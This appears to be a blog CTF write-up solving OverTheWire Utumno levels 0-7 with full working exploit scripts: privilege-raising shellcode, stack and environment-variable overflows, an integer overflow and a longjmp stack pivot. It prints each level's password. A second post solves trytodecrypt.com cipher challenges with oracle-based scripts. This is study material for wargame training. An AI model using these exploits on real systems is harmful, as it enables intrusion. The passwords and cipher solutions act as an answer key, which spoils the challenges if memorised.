OverTheWire - Utumno

Posted on 2026-06-01 In ctf Disqus:

utumno

utumno.labs.overthewire.org 2227

Utumno: 10 levels (0-9). Harder than Behemoth — creative exploitation: LD_PRELOAD hooking, argv/envp manipulation, integer overflows, negative index writes, setjmp/longjmp interference with pointer mangling.

Each user gets /tmp/utumno<N>/ for temp files.

SSH Information
Host: utumno.labs.overthewire.org
Port: 2227
User: utumno0
Passwords: /etc/utumno_pass/
Binaries: /utumno/

level 0 → level 1

Initial password: utumno0

Level 0: The binary is exec-only (no read permission). Calls puts() with the password string embedded in .rodata. Use LD_PRELOAD to hook puts() and dump the binary's data section from within the process:

utumno0@utumno:/tmp/tmp.1hNZplWoeJ$ gcc -Wall -shared -fPIC -ldl -m32 -o hook32.so ld-preload-hooks.c -DENABLE_ALL
utumno0@utumno:/tmp/tmp.1hNZplWoeJ$ LD_PRELOAD=./hook32.so /utumno/utumno0
[LD_PRELOAD hook loaded] enabled: ALL
[HOOK puts] 'Read me! :P'
Read me! :P

utumno0@utumno:/tmp/tmp.1hNZplWoeJ$ vim hook-memdump.c
utumno0@utumno:/tmp/tmp.1hNZplWoeJ$ gcc -m32 -shared -fPIC -o hook-memdump.so hook-memdump.c
utumno0@utumno:/tmp/tmp.1hNZplWoeJ$ LD_PRELOAD=./hook-memdump.so /utumno/utumno0
x.so.2
_used
rt_main
_2.0
on_start__
: **********
# ...

you can get the hook script from my scripts repo

ctf-tool

or use this script

// gcc -m32 -fPIC -shared preload.c -o preload.so
#include <stdio.h>
int puts(const char *str) {
    const unsigned char *p = (const unsigned char *)0x0804a000;
    for (int i = 0; i < 0x1000; i += 16) {
        int ok = 1;
        for (int j = 0; j < 16 && p[i+j]; j++)
            if (p[i+j] < 0x20 || p[i+j] > 0x7e) ok = 0;
        if (ok) fprintf(stderr, "%s\n", p+i);
    }
    return 0;
}

1 2	$ gcc -m32 -fPIC -shared preload.c -o preload.so $ LD_PRELOAD=./preload.so /utumno/utumno0 2>&1

The password sits at 0x0804a010 in the binary's data section as a literal string.

ytvWa6DzmL

level 1 → level 2

Level 1: Binary reads filenames from a directory and executes the part after sh_ as raw machine code.

Binary logic:

Check argv[1] != NULL, else exit(1)
mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) → RWX region
opendir(argv[1]), loop readdir()
For each entry: strncmp(dname, "sh", 3) == 0 → match
run(d_name + 3) → chdir(argv[1]), copy shellcode to RWX region, jmp there

So the shellcode IS the filename (after "sh_"). Constraints:

No null bytes (strcpy stops at \0)
No / (0x2f) — path separator, kernel rejects it in the filename
Max 252 bytes (Linux filename limit 255 − 3 for "sh_")

r2 -A -q -c "pdf @ sym.main" /utumno/utumno1
┌ 173: int dbg.main (char **envp);
│ `- args(sp[0x8..0x10]) vars(4:sp[0x0..0xc])
│           0x0804921b      55             push ebp                    ; utumno1.c:40:1 ; int main(int argc,char ** argv);
│           0x0804921c      89e5           mov ebp, esp
│           0x0804921e      83ec08         sub esp, 8
│           0x08049221      8b450c         mov eax, dword [envp]       ; utumno1.c:44:14
│           0x08049224      83c004         add eax, 4
│           0x08049227      8b00           mov eax, dword [eax]
│           0x08049229      85c0           test eax, eax               ; utumno1.c:44:8
│       ┌─< 0x0804922b      7507           jne 0x8049234
│       │   0x0804922d      6a01           push 1                      ; utumno1.c:46:9 ; 1 ; int status
│       │   0x0804922f      e81cfeffff     call sym.imp.exit           ; void exit(int status)
│       │   ; CODE XREF from dbg.main @ 0x804922b(x)
│       └─> 0x08049234      6a00           push 0                      ; utumno1.c:49:11
│           0x08049236      6aff           push 0xffffffffffffffff
│           0x08049238      6a22           push 0x22                   ; '\"' ; 34
│           0x0804923a      6a07           push 7                      ; 7
│           0x0804923c      6800100000     push 0x1000
│           0x08049241      6a00           push 0
│           0x08049243      e818feffff     call sym.imp.mmap           ; void*mmap(void*addr, size_t length, int prot, int flags, int fd, size_t offset)
│           0x08049248      83c418         add esp, 0x18
│           0x0804924b      a32cb20408     mov dword [obj.rwx], eax    ; utumno1.c:49:9 ; [0x804b22c:4]=0
│           0x08049250      a12cb20408     mov eax, dword [obj.rwx]    ; utumno1.c:50:9 ; [0x804b22c:4]=0
│           0x08049255      85c0           test eax, eax               ; utumno1.c:50:8
│       ┌─< 0x08049257      7507           jne 0x8049260
│       │   0x08049259      6a02           push 2                      ; utumno1.c:51:9 ; 2 ; int status
│       │   0x0804925b      e8f0fdffff     call sym.imp.exit           ; void exit(int status)
│       │   ; CODE XREF from dbg.main @ 0x8049257(x)
│       └─> 0x08049260      8b450c         mov eax, dword [envp]       ; utumno1.c:53:22
│           0x08049263      83c004         add eax, 4
│           0x08049266      8b00           mov eax, dword [eax]        ; utumno1.c:53:10
│           0x08049268      50             push eax
│           0x08049269      e832feffff     call sym.imp.opendir
│           0x0804926e      83c404         add esp, 4
│           0x08049271      8945f8         mov dword [var_8h], eax
│           0x08049274      837df800       cmp dword [var_8h], 0       ; utumno1.c:54:8
│       ┌─< 0x08049278      7533           jne 0x80492ad
│       │   0x0804927a      6a01           push 1                      ; utumno1.c:56:9 ; 1 ; int status
│       │   0x0804927c      e8cffdffff     call sym.imp.exit           ; void exit(int status)
│       │   ; CODE XREF from dbg.main @ 0x80492bf(x)
│      ┌──> 0x08049281      8b45fc         mov eax, dword [s2]         ; utumno1.c:61:30
│      ╎│   0x08049284      83c00b         add eax, 0xb                ; 11
│      ╎│   0x08049287      6a03           push 3                      ; utumno1.c:61:13 ; 3 ; size_t n
│      ╎│   0x08049289      50             push eax                    ; const char *s2
│      ╎│   0x0804928a      6808a00408     push 0x804a008              ; const char *s1
│      ╎│   0x0804928f      e8fcfdffff     call sym.imp.strncmp        ; int strncmp(const char *s1, const char *s2, size_t n)
│      ╎│   0x08049294      83c40c         add esp, 0xc
│      ╎│   0x08049297      85c0           test eax, eax               ; utumno1.c:61:12
│     ┌───< 0x08049299      7512           jne 0x80492ad
│     │╎│   0x0804929b      8b45fc         mov eax, dword [s2]         ; utumno1.c:63:17
│     │╎│   0x0804929e      83c00b         add eax, 0xb                ; 11
│     │╎│   0x080492a1      83c003         add eax, 3                  ; utumno1.c:63:13
│     │╎│   0x080492a4      50             push eax                    ; int32_t arg_8h
│     │╎│   0x080492a5      e81cffffff     call dbg.run
│     │╎│   0x080492aa      83c404         add esp, 4
│     │╎│   ; CODE XREFS from dbg.main @ 0x8049278(x), 0x8049299(x)
│     └─└─> 0x080492ad      ff75f8         push dword [var_8h]         ; utumno1.c:59:18
│      ╎    0x080492b0      e8cbfdffff     call sym.imp.readdir
│      ╎    0x080492b5      83c404         add esp, 4
│      ╎    0x080492b8      8945fc         mov dword [s2], eax
│      ╎    0x080492bb      837dfc00       cmp dword [s2], 0           ; utumno1.c:59:31
│      └──< 0x080492bf      75c0           jne 0x8049281
│           0x080492c1      b800000000     mov eax, 0                  ; utumno1.c:67:12
│           0x080492c6      c9             leave                       ; utumno1.c:68:1
└           0x080492c7      c3             ret

# Build the shellcode, verify it has no nulls or /
$ python3 -c "
from pwn import *; context.arch='i386'
sc = asm('xor eax,eax; xor ebx,ebx; mov bx,0x3e82; xor ecx,ecx; mov cx,0x3e82; mov al,71; int 0x80; xor eax,eax; push eax; push 0x65646f63; mov ebx,esp; push eax; mov edx,esp; push ebx; mov ecx,esp; mov al,11; int 0x80')
import sys; sys.stdout.buffer.write(sc)
" | xxd | head -1
# Should show no 00 or 2f bytes

# Set up the directory: symlink to /bin/sh, shellcode as filename
$ mkdir /tmp/x
$ ln -sf /bin/sh /tmp/x/code
$ python3 -c "
import sys, os; from pwn import *; context.arch='i386'
sc = asm('xor eax,eax; xor ebx,ebx; mov bx,0x3e82; xor ecx,ecx; mov cx,0x3e82; mov al,71; int 0x80; xor eax,eax; push eax; push 0x65646f63; mov ebx,esp; push eax; mov edx,esp; push ebx; mov ecx,esp; mov al,11; int 0x80')
# Create file with raw shellcode bytes as filename (must be bytes path)
fd = os.open(b'/tmp/x/sh_' + sc, os.O_CREAT | os.O_WRONLY); os.close(fd)
"
$ /utumno/utumno1 /tmp/x
$ cat /etc/utumno_pass/utumno2

The shellcode does setreuid(16002,16002) (utumno2 UID = 0x3e82) then execve("code", ["code"], NULL) where "code" is a symlink to /bin/sh. The binary's run() calls chdir(argv[1]) before executing the shellcode, so the relative path "code" resolves correctly under /tmp/x/.

RdUzprHKSm

level 2 → level 3

Level 2: Binary checks argc == 0 then does strcpy(local_buf, envp[9]). Need argc == 0 via execve(path, NULL, envp). The 10th envp entry (envp[9]) overflows the 12-byte buffer, overwriting saved EBP and return address. Put NOP sled + shellcode in an earlier envp entry and point the return address there.

Write a Python script using pwntools + ctypes to call execve() with crafted envp:

#!/usr/bin/env python3
from pwn import *
import ctypes

context.arch = 'i386'

shellcode = asm("""
    xor eax, eax
    xor ebx, ebx
    mov bx, 0x3e83          /* utumno3 UID */
    xor ecx, ecx
    mov cx, 0x3e83
    mov al, 71              /* setreuid */
    int 0x80
    xor eax, eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11              /* execve */
    int 0x80
""")

nop_sled_len = 52
payload = b'\x90' * nop_sled_len + shellcode

# Find NOP address with GDB first!
# On gibson-1 with clean env: 0xffffdfb0 (52 NOPs before shellcode)
ret_addr = 0xffffdfb0
overflow = b'A' * 16 + p32(ret_addr)

# Build envp via ctypes (to get argc=0, pass NULL argv)
libc = ctypes.CDLL(None)
envp_entries = [b''] * 8 + [payload, overflow, None]
envp_arr = (ctypes.c_char_p * len(envp_entries))(*envp_entries)

libc.execve(b'/utumno/utumno2', None, envp_arr)

envp layout:

indices 0-7: empty strings (filler)
index 8: NOP×52 + shellcode (return address points here)
index 9: "AAAA×4" + p32(ret_addr) — overflow data, strcpy'd into buffer

Find the NOP sled address in GDB, update ret_addr, then run:

1
2
3

$ python3 exploit.py
$ id
$ cat /etc/utumno_pass/utumno3

h3kVKJZuid

level 3 → level 4

Level 3: Byte-by-byte return address overwrite. Binary reads pairs of bytes (position, value) via getchar() in a loop. The position byte is XOR'd with (iteration * 3) before being used as an offset from [ebp - 0x24] (or [ebp - 0x20] on the current binary version — check the offset with GDB). Need to compute position bytes that target EIP after the XOR transform.

The loop runs up to 24 iterations. We send 4 pairs for the 4 bytes of the return address, then fill remaining slots with harmless writes.

Shellcode goes in EGG environment variable with a NOP sled. Find the sled address with GDB.

#!/usr/bin/env python3
from pwn import *
import struct
import os
import subprocess

context.arch = 'i386'

shellcode = asm("""
    xor eax, eax
    xor ebx, ebx
    mov bx, 0x3e84          /* utumno4 UID */
    xor ecx, ecx
    mov cx, 0x3e84
    mov al, 71              /* setreuid */
    int 0x80
    xor eax, eax
    push eax
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11              /* execve */
    int 0x80
""")

# Find NOP address in EGG env var with GDB first!
# On gibson-1 with clean env: NOP sled at ~0xffffde00
NOP_ADDR = 0xffffde00

# Position bytes: write at [ebp - 0x20] + (P XOR (i*3))
# Target EIP at ebp+4, so need offset = 0x24 from base
# P XOR (i*3) = 0x24 → P = 0x24 XOR (i*3)
target = struct.pack('<I', NOP_ADDR)
payload = bytes([
    0x24, target[0],   # i=0: 0x24 XOR 0 = 0x24
    0x27, target[1],   # i=1: 0x24 XOR 3 = 0x27
    0x22, target[2],   # i=2: 0x24 XOR 6 = 0x22
    0x2d, target[3],   # i=3: 0x24 XOR 9 = 0x2d
])

# Fill remaining iterations with writes to saved EBP (harmless)
for j in range(4, 24):
    p_val = (0x20) ^ (j * 3)   # writes to ebp + 0
    payload += bytes([p_val & 0xff, 0x41])

# Commands for the spawned shell (read from remaining stdin)
payload += b'id\ncat /etc/utumno_pass/utumno4\nexit\n'

# Launch binary with EGG env var containing NOP sled + shellcode
env = os.environ.copy()
env['EGG'] = b'\x90' * 500 + shellcode
subprocess.run(['./utumno/utumno3'], input=payload, env=env)

1	$ python3 exploit.py

qHWLExh7C5

level 4 → level 5

Level 4: Integer overflow in memcpy(). Arg1 is converted with atoi(), checked as 16-bit ≤ 63, but the actual memcpy size uses the full 32-bit value. Pass 65536 as arg1 → 16-bit truncation yields 0 (≤ 63), but memcpy copies 65536 bytes.

Offset to EIP: 65286 bytes. Put NOP sled + shellcode in the buffer itself (second argument), with return address pointing into the NOP sled.

#!/usr/bin/env python3
from pwn import *
import struct
import os
import subprocess

context.arch = 'i386'

shellcode = asm(shellcraft.cat('/etc/utumno_pass/utumno5'))

# Second argument: NOP + shellcode + padding + ret addr
OFFSET = 65286
payload = b'\x90' * 500
payload += shellcode
payload += b'\x90' * (OFFSET - len(payload))

# NOP address (find with GDB; 0xfffddd2a on gibson-1)
NOP_ADDR = 0xfffddd2a
payload += struct.pack('<I', NOP_ADDR)
# Pad to fill 65536 bytes (matches the overflow size via arg1)
payload += b'\x90' * (65536 - len(payload))

# Pass payload as argv[2] directly (no shell byte-corruption)
subprocess.run(['/utumno/utumno4', '65536', payload])

1	$ python3 exploit.py

vY134qxapL

level 5 → level 6

Level 5: Requires argc == 0 (or argc == 1 with argv[0][0] == 0). Accesses argv[10] which equals envp[9] (since argv[0]=NULL for argc=0). The hihi() function does strlen(envp[9]); if > 19 chars, uses strncpy(buf, envp[9], 20) overwriting 12-byte buffer + saved EBP + return address. Shellcode goes in envp[8].

Critical: On this server, execve(path, NULL, envp) sets argc=1 with argv[0]="". So argv[10] = envp[8], not envp[9]. Need to swap: envp[8] = overflow data, envp[9] = shellcode with NOP sled.

#!/usr/bin/env python3
from pwn import *
import ctypes

context.arch = 'i386'

shellcode = asm(shellcraft.cat('/etc/utumno_pass/utumno6'))
nop_sled = b'\x90' * 100 + shellcode

# overflow: strncpy copies 20 bytes max
#   0-11:  fills 12-byte buffer
#  12-15:  overwrites saved EBP
#  16-19:  overwrites return address -> NOP sled
NOP_ADDR = 0xffffdf44   # find NOP address in envp[9] with GDB
overflow = b'A' * 12 + b'B' * 4 + p32(NOP_ADDR)

# Build envp: argv[10] = envp[8] on this server (argc=1, argv[0]="")
envp_entries = [b''] * 8 + [overflow, nop_sled, None]
envp_arr = (ctypes.c_char_p * len(envp_entries))(*envp_entries)

libc = ctypes.CDLL(None)
libc.execve(b'/utumno/utumno5', None, envp_arr)

1	$ python3 exploit.py

aGlKWrixsh

level 6 → level 7

Level 6: Table-based key-value store with 3 args: position (base10), value (base16), description (string). A write at [ebp + pos*4 - 0x30] with position = -1 overwrites the malloc pointer at [ebp - 0x34]. Then strcpy(corrupted_malloc_ptr, argv[3]) copies description to the overwritten address — a controlled write to anywhere.

Attack: Position -1 overwrites the malloc pointer at [ebp - 0x34] with the return address as an integer. Then strcpy(corrupted_ptr, argv[3]) copies the packed shellcode address to the return slot — hijacking EIP.

Write primitive chain:

[ebp - 0x34] = ret_addr via the table write (pos=-1, value=0xffffda9c)
strcpy(0xffffda9c, argv[3]) — writes 4 bytes of packed NOP address to the return slot
Function returns → EIP = NOP sled in EGG → shellcode

#!/usr/bin/env python3
from ctypes import *
from pwn import *; context.arch='i386'
import struct

libc = CDLL('libc.so.6')

# Build EGG: NOP sled + null-free shellcode(same to use cat)
sc = asm(shellcraft.execve('/bin/cat', ['/bin/cat', '/etc/utumno_pass/utumno7']))
egg = b'\x90' * 300 + sc

# Find these on the server via GDB (varies per environment):
#   EBP ≈ 0xffffda98 → RET at 0xffffda9c
#   NOP sled in EGG ≈ 0xffffddb0
ret_addr_loc = 0xffffda9c    # write target: return slot
nop_addr     = 0xffffddb0    # shellcode landing zone in EGG

argv = (c_char_p * 4)()
argv[0] = b'/utumno/utumno6'
argv[1] = b'-1'
argv[2] = f'{ret_addr_loc:#x}'.encode()  # overwrite malloc ptr → ret addr
argv[3] = struct.pack('<I', nop_addr)     # strcpy'd to ret slot

envp = (c_char_p * 2)()
envp[0] = egg
envp[1] = None

libc.execve(b'/utumno/utumno6', argv, envp)

Address finding: Use GDB on the server to get EBP and NOP location. GDB vs non-GDB stack shift is ~0x60 on gibson-1 (from extra env vars GDB adds). Run the exploit directly (not in GDB) with addresses found via GDB + known offset.

VHOuCx7iA5

level 7 → utumno8

Level 7: Stack BOF with setjmp/longjmp. Binary allocates a 288-byte buffer at [ebp-0x120], a jmp_buf at [ebp-0xa0] (128 bytes into buffer), calls _setjmp, strcpy from argv[1], then longjmp.

glibc 2.39 PTR_MANGLE: longjmp uses pointer mangling on ESP and EIP (XOR with thread-local secret + rotate left 9). Only EBP is stored/restored raw. Direct EIP overwrite via jmp_buf doesn't work.

Strategy: Overwrite jmp_buf[3] (EBP, NOT mangled) at buffer offset 140 with the buffer address. After longjmp restores EBP = buffer_addr, the leave; ret sequence at vuln+84 pivots there.

Payload (144 bytes, null at byte 144 preserves mangled ESP/EIP):

buf[0-3]:   junk (popped into EBP by leave)
buf[4-7]:   buf_addr + 8 (popped into EIP by ret)
buf[8-127]: shellcode + NOP padding (pwntools generates ~90 bytes)
buf[128-131]: EBX (any)
buf[132-135]: ESI (any)
buf[136-139]: EDI (any)
buf[140-143]: buf_addr (jmp_buf.EBP → stack pivot)
null at 144

Two critical details:

Null-free shellcode: The shellcode must NOT contain null bytes (strcpy stops at the first null). Use mov bl, val; mov bh, val instead of mov ebx, val32 which embeds nulls in the high bytes.
Avoid /bin/sh: Dash drops EUID to RUID on startup (privilege sanitization). Use execve("/bin/cat", ["/bin/cat", "/etc/utumno_pass/utumno8", NULL], NULL) instead — no shell, no privilege drop.
Buffer address finding: Since randomize_va_space=0 but GDB subtly shifts the stack, use a test shellcode (exit(42)) to brute-force the address. On gibson-1 with full SSH environment, buffer = 0xffffda2c.

Exploit script (exploit.py):

#!/usr/bin/env python3
import os, sys, struct
from pwn import *; context.arch='i386'

buf_addr = int(sys.argv[1], 16) if len(sys.argv) > 1 else 0xffffda2c

# Build payload (145 bytes, null at byte 144 preserves mangled ESP/EIP)
payload = bytearray(145)
# buf[0-3]: junk (popped into EBP by leave)
payload[0:4] = struct.pack('<I', 0x41414141)
# buf[4-7]: buf_addr + 8 (popped into EIP by ret)
payload[4:8] = struct.pack('<I', buf_addr + 8)
# buf[8-127]: null-free shellcode + NOP padding
sc = asm(shellcraft.execve('/bin/cat', ['/bin/cat', '/etc/utumno_pass/utumno8']))
payload[8:8+len(sc)] = sc
for i in range(8 + len(sc), 128):
    payload[i] = 0x90
# buf[128-131]: EBX (any)
payload[128:132] = struct.pack('<I', 0x42424242)
# buf[132-135]: ESI (any)
payload[132:136] = struct.pack('<I', 0x43434343)
# buf[136-139]: EDI (any)
payload[136:140] = struct.pack('<I', 0x44444444)
# buf[140-143]: buf_addr (jmp_buf.EBP → stack pivot)
payload[140:144] = struct.pack('<I', buf_addr)
# byte 144 = 0 (strcpy stop → preserves mangled ESP/EIP)
payload[144] = 0

os.execve('/utumno/utumno7', ['/utumno/utumno7', bytes(payload)], os.environ)

1	$ python3 exploit.py ffffda2c

oqnM7PWFIn

trytodecrypt.com — too much! (19-23)

Posted on 2026-05-31 In ctf Disqus:

trytodecrypt.com

Text 19

5F70017FDD92B75AA6668648B404223663157787B35686FA165A8193E5075777F

与 Text 16 类似，每 4 位 hex 一组（偏移 + 编码字符）。前 13 位 hex（8 字节）是前缀/校验，有效数据从第 14 位开始。

CHARSET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?! "

# ============================================================
# Text 19 — Too Much 1
# Known solution: R2D2:C3PO:BB8
# Structure: each char encoded as 5 hex chars
# First n hex chars = separators (1 per char)
def decode_text19(ct):
    result = ""
    if len(ct) == 65:
        data = ct[13:]
    else:
        raise ValueError(f"Unexpected ciphertext length: {len(ct)}")

    for i in range(0, len(data), 4):
        pair = data[i : i + 4]
        if len(pair) < 4:
            break
        offset = int(pair[0:2], 16)
        enc = int(pair[2:4], 16)
        diff = (enc - offset) % len(CHARSET)
        if 0 <= diff < len(CHARSET):
            result += CHARSET[diff]
        else:
            result += "?"

    # Fixed version has 2 key chars prefix
    if len(ct) == 76 and len(result) > 2:
        return result[2:]
    return result

R2D2:C3PO:BB8

Text 20

8221E4F2173368D6B6B6E5050935D986A8C4CA764CF8A8C4B734E99807140B19DB691998095CC4E3D6C60D6E91

结构

目标密文长度是 90 hex，明文长度应为 18 字符。API 加密满足：

1	len(encrypt(text)) == 5 * len(text)

每 5 hex token 可以按下面方式观察：

1	[prefix 1 hex][a 2 hex][b 2 hex]

目标密文按这个 layout 拆开：

pos group  p   a    b    (b-a)%71
0   8221E  8   34   30   67
1   4F217  4   242  23   65
2   3368D  3   54   141  16
3   6B6B6  6   182  182  0
4   E5050  E   80   80   0
5   935D9  9   53   217  22
6   86A8C  8   106  140  34
7   4CA76  4   202  118  58
8   4CF8A  4   207  138  2
9   8C4B7  8   196  183  58
10  34E99  3   78   153  4
11  80714  8   7    20   13
12  0B19D  0   177  157  51
13  B6919  B   105  25   62
14  98095  9   128  149  21
15  CC4E3  C   196  227  31
16  D6C60  D   108  96   59
17  D6E91  D   110  145  35

这题是 randomized encryption：同一 plaintext 每次加密都不同。简单把 b-a、a-b、xor、prefix 当 key 都不成立。

1
2
3

prefixes = ct[:n]
pairs    = ct[n:]
item_i   = (prefixes[i], pairs[4*i:4*i+2], pairs[4*i+2:4*i+4])

在这个 layout 下，相邻 token 的 transition 有强信号：

1	delta_i = b_i - a_{i+1} mod 71

对 one-hot plaintext（例如 aaaaaaaaaaaaaaaaaa、wwwwwwwwwwwwwwwwww）采样时，前 13 个 transition 的 delta_i 对字符有明显泄露。它不是完美映射，会有错字和缺位，但不是随机噪声。把目标密文的前 13 个 transition 丢进这个映射，得到：

1	Par!2Lan6aaND

这个结果已经足够说明几件事：

1
2
3

Par      -> 很像 Paris 的开头
Lan      -> 很像 London 的中段/开头线索
aaND     -> 有明显的 N/D 大写结构，像 NewYork 这类拼接地名的残片

也就是说，算法至少泄露出“城市名串”的轮廓。再结合 Text 20 明文长度必须是 18 字符，最自然的补全是：

1	ParisLondonNewYork

用 solve API 验证：

1	solve?id=20&solution=ParisLondonNewYork -> 1

ParisLondonNewYork

已排除的方向

这些方向已经用 oracle 样本和 held-out 测试排除，不值得无新假设地重复：

exact 5-hex token dictionary
inline/front/split-half/first-byte key 布局
(b-a)%71, (a-b)%71, +/- prefix, xor, raw byte
first K hex as global key/nonce
affine forms mod 71/72/128/256
per-position naive Bayes / local feature classifier
Text20 -> Text23 子块投票迁移
solve API 低置信候选枚举

尤其是统计模型很容易在 constant corpus 上过拟合。用 random plaintext 做 5-fold held-out 后，top5 基本等于随机基线：

fold0 top1=0.0139 top5=0.0736
fold1 top1=0.0181 top5=0.0833
fold2 top1=0.0181 top5=0.0806
fold3 top1=0.0097 top5=0.0542
fold4 top1=0.0194 top5=0.0833
random_top5 baseline = 5/71 = 0.0704

一个有价值但尚未破解的结构

把密文看成 front layout：前 n 个 hex 是 prefix，后面每字符 4 hex 是两个 byte。这个视角下，前 13 个相邻 transition 有明显结构：

1	delta_i = b_i - a_{i+1} mod 256

对 repeated char 样本，前 13 个 transition 很稳定：

1
2
3

w -> w  基本总是 0
0 -> 0  主要是 163 / 162
a -> a  主要是 114 / 115

但从 pos13 之后，这个 transition 会退化成近随机。也就是说，算法里可能存在一段链式状态，长度或边界不是简单的 18 字符全程一致。

尝试把 target 的 transition 当成普通 pair dictionary 解路径失败：高分候选都不是合理明文，少量提交也返回 0。因此这里的结构更像某种 state/nonce/PRNG relation，而不是 F(ch_i, ch_{i+1}) 这种直接查表。

当前结论

Text 20 的答案已通过 solve API 验证。它的核心不是 per-token decode，也不是纯靠猜；而是：

1. 通过长度确认明文 18 字符。
2. 改用 front layout 拆出 prefix 和 byte pairs。
3. 从相邻 transition 中恢复出前 13 位附近的带噪声骨架：Par!2Lan6aaND。
4. 根据骨架和 18 字符长度，提出城市名串候选 ParisLondonNewYork。
5. 用 solve API 验证，返回 1。

所以这里确实有语义猜测，但不是 blind guess。更准确地说，它是“结构泄露 + 人类模式识别 + oracle 验证”。后 5 位没有找到独立稳定 channel，因此没有把完整公式还原出来。

Text 21

333131353156333131323231305230363135315631333151342F3430313131323154342F

每字符加密为 4 位 hex（2 ASCII 字节），固定替换表。密文 hex 解码后每 2 字节对应一个明文字符。

#!/usr/bin/env python3
"""Build character mapping from trytodecrypt.com encrypt API.

Usage: trytodecrypt_get_char_map.py <text_id> <api_key>

Encrypts each character in the charset via the API, maps
full response -> character. Parallel requests for speed.
Outputs a sorted Python dict literal.
"""
import sys
import urllib.parse
import urllib.request
from concurrent.futures import ThreadPoolExecutor, as_completed

C = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?! "
URL = "http://api.trytodecrypt.com/encrypt?key={key}&id={id}&text={text}"


def encrypt(ch, text_id, api_key):
    url = URL.format(key=api_key, id=text_id, text=urllib.parse.quote(ch))
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read().decode().strip()
    except Exception as e:
        return None


if __name__ == "__main__":
    text_id = sys.argv[1]
    api_key = sys.argv[2]

    mapping = {}
    total = len(C)
    with ThreadPoolExecutor(max_workers=12) as pool:
        fut_map = {pool.submit(encrypt, ch, text_id, api_key): ch for ch in C}
        for i, fut in enumerate(as_completed(fut_map), 1):
            ch = fut_map[fut]
            enc = fut.result()
            if enc:
                mapping[enc] = ch
            print(f"\r  [{i}/{total}] {repr(ch)} -> {enc or 'FAIL'}" + " " * 10,
                  end="", file=sys.stderr, flush=True)
    print(file=sys.stderr)

    if mapping:
        print({k: mapping[k] for k in sorted(mapping.keys())})
    else:
        print("{}")
        sys.exit(1)

# ============================================================
# Text 21 — Too Much 3
# Known solution: TryToDecrypt! now!
# Encryption: each plaintext char maps to 4 fixed hex chars
# (step=4, simple substitution)
# ============================================================
def decode_text21(ct):
    """Decode Text 21 — fixed 4-hex substitution."""
    # The known mapping (built from encrypt oracle):
    # Each char -> exactly 4 hex chars
    mapping = {
        '0': '2F54',
        '1': '2F55',
        '2': '2F56',
        '3': '302D',
        '4': '302E',
        '5': '302F',
        '6': '3030',
        '7': '3031',
        '8': '3032',
        '9': '3033',
        'a': '3034',
        'b': '3035',
        'c': '3036',
        'd': '3051',
        'e': '3052',
        'f': '3053',
        'g': '3054',
        'h': '3055',
        'i': '3056',
        'j': '312D',
        'k': '312E',
        'l': '312F',
        'm': '3130',
        'n': '3131',
        'o': '3132',
        'p': '3133',
        'q': '3134',
        'r': '3135',
        's': '3136',
        't': '3151',
        'u': '3152',
        'v': '3153',
        'w': '3154',
        'x': '3155',
        'y': '3156',
        'z': '322D',
        'A': '322E',
        'B': '322F',
        'C': '3230',
        'D': '3231',
        'E': '3232',
        'F': '3233',
        'G': '3234',
        'H': '3235',
        'I': '3236',
        'J': '3251',
        'K': '3252',
        'L': '3253',
        'M': '3254',
        'N': '3255',
        'O': '3256',
        'P': '332D',
        'Q': '332E',
        'R': '332F',
        'S': '3330',
        'T': '3331',
        'U': '3332',
        'V': '3333',
        'W': '3334',
        'X': '3335',
        'Y': '3336',
        'Z': '3351',
        '-': '3352',
        '_': '3353',
        '.': '3354',
        ',': '3355',
        ';': '3356',
        ':': '342D',
        '?': '342E',
        '!': '342F',
        ' ': '3430',
    }
    reverse_mapping = {v: k for k, v in mapping.items()}

    result = ""
    for i in range(0, len(ct), 4):
        chunk = ct[i : i + 4]
        if chunk in reverse_mapping:
            result += reverse_mapping[chunk]
        else:
            result += "?"
    return result

TryToDecrypt! now!

Text 22

00100401400A0120A101C0310F503706004E05B0870A00880D80ED0BE1262890FD16816A1453453721963ED1D11F04624D9

结构分析

99 hex，每字符加密为 9 hex（3 组 × 3 hex），共 11 字符。

加密是确定性的——同一输入永远返回同一输出——但算法是位置相关的：同一个字符在不同位置产生完全不同的密文。

加密 0（charset index 0）和 a（index 10）在不同位置的输出：

1 2	位置 0: '0' → [001, 003, 008] 'a' → [001, 003, 050] 仅 group2 变化位置 1: '0' → [00A, 00F, 01F] 'a' → [00A, 012, 01C] group1/2 都变

关键观察：

group0 只与位置有关，与字符无关（同一位置所有字符共享同一个 group0，如位置 0 永远是 001、位置 1 永远是 00A）
group1 + group2 共同编码字符，但公式复杂且各位置不同
不存在简单的线性公式——尝试过 (b2-b1) % 71、(b1+b2-K) % 71、(b1 XOR b2) % 71 等均不成立

解法：progressive guessing（渐进猜解）

不需要理解加密公式也能解密——只要能调用加密工具，就可以暴力猜解。

核心依赖密文的前缀保持性质：

1
2
3

encrypt("a")     → 001003050          (9 hex)
encrypt("ab")    → 00100305000A01201F (18 hex，前 9 hex 与 "a" 一致)
encrypt("abc")   → 00100305000A01201F... (前 18 hex 与 "ab" 一致)

密文的前 N×9 hex 完全由明文的前 N 个字符决定。后续字符不影响前面的密文段。

算法：

从空字符串开始
对位置 i，已有正确前缀 guess（前 i 个字符已破解）
遍历 charset 中全部 71 个候选字符 c
通过 API 加密 guess + c
如果返回的密文以目标密文的前 (i+1)×9 hex 开头，则 c 就是第 i 位字符
重复至 11 位全部破解

最坏 11 × 71 = 781 次 API 调用，几分钟跑完。

关于反爬

最初尝试用 web 端加密（POST https://www.trytodecrypt.com/decrypt.php）做猜解，但非浏览器请求被服务端 bot 检测拦截，始终返回 503 Service Unavailable。即使带上 PHPSESSID cookie 和 User-Agent 也无济于事。

切换到独立 API 接口即解决：

# 有反爬（503）
POST https://www.trytodecrypt.com/decrypt.php?id=22
body: text=a&encrypt=Encrypt

# 无反爬（正常）
GET http://api.trytodecrypt.com/encrypt?key=KEY&id=22&text=a

API 端用 key 做身份认证，不做 bot 检测。key 在登录后从 API 页面获取。

